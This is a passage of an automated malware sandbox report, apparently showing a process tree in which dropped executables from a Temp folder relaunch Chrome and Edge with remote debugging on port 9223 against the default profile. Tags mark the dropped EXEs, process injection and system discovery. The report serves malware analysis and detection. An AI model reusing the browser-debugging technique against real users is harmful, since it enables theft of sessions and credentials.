                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                    8⤵
                                                    • Uses browser remote debugging
                                                    PID:2712
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                    8⤵
                                                    • Uses browser remote debugging
                                                    PID:3132
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2592 /prefetch:2
                                                    8⤵
                                                      PID:2936
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2148 /prefetch:2
                                                      8⤵
                                                        PID:5960
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3660 /prefetch:2
                                                        8⤵
                                                          PID:1072
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3564 /prefetch:2
                                                          8⤵
                                                            PID:4472
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2492 /prefetch:2
                                                            8⤵
                                                              PID:5196
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3660 /prefetch:2
                                                              8⤵
                                                                PID:412
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3528 /prefetch:2
                                                                8⤵
                                                                  PID:5828
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                7⤵
                                                                • Uses browser remote debugging
                                                                PID:60
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718
                                                                  8⤵
                                                                    PID:5104
                                                            • C:\Users\Admin\AppData\Local\Temp\10097300101\zY9sqWs.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10097300101\zY9sqWs.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2520
                                                            • C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3776
                                                              • C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4004
                                                              • C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10097310101\mAtJWNv.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Checks processor information in registry
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2152
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                  7⤵
                                                                  • Uses browser remote debugging
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:2068
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd9e46cc40,0x7ffd9e46cc4c,0x7ffd9e46cc58
                                                                    8⤵
                                                                      PID:1144
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1880 /prefetch:2
                                                                      8⤵
                                                                        PID:1532
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2408 /prefetch:3
                                                                        8⤵
                                                                          PID:1668
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:8
                                                                          8⤵
                                                                            PID:3640
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:4816
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:3872
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3872,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1
                                                                            8⤵
                                                                            • Uses browser remote debugging
                                                                            PID:4268
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4308 /prefetch:8
                                                                            8⤵
                                                                              PID:2096
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4232,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
                                                                              8⤵
                                                                                PID:2628
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:8
                                                                                8⤵
                                                                                  PID:1724
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,9488978124183622778,5510890230047722684,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4772 /prefetch:8
                                                                                  8⤵
                                                                                    PID:860
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                  7⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5304
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718
                                                                                    8⤵
                                                                                      PID:5316
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1920 /prefetch:2
                                                                                      8⤵
                                                                                        PID:5672
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
                                                                                        8⤵
                                                                                          PID:5680
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
                                                                                          8⤵
                                                                                            PID:5788
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
                                                                                            8⤵
                                                                                              PID:5884
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                              8⤵
                                                                                              • Uses browser remote debugging
                                                                                              PID:5964
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                              8⤵
                                                                                              • Uses browser remote debugging
                                                                                              PID:5976
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2392 /prefetch:2
                                                                                              8⤵
                                                                                                PID:6000
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2392 /prefetch:2
                                                                                                8⤵
                                                                                                  PID:6128
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3104 /prefetch:2
                                                                                                  8⤵
                                                                                                    PID:5288
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3796 /prefetch:2
                                                                                                    8⤵
                                                                                                      PID:3096
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4136 /prefetch:2
                                                                                                      8⤵
                                                                                                        PID:1988
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3180 /prefetch:2
                                                                                                        8⤵
                                                                                                          PID:4916
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,17259447152300527465,16509832050240450135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4128 /prefetch:2
                                                                                                          8⤵
                                                                                                            PID:2360
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                          7⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:840
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718
                                                                                                            8⤵
                                                                                                              PID:4532
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                                                                                                              8⤵
                                                                                                                PID:4316
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
                                                                                                                8⤵
                                                                                                                  PID:5616
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,10082304384663712503,9012211356006156358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:5540
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
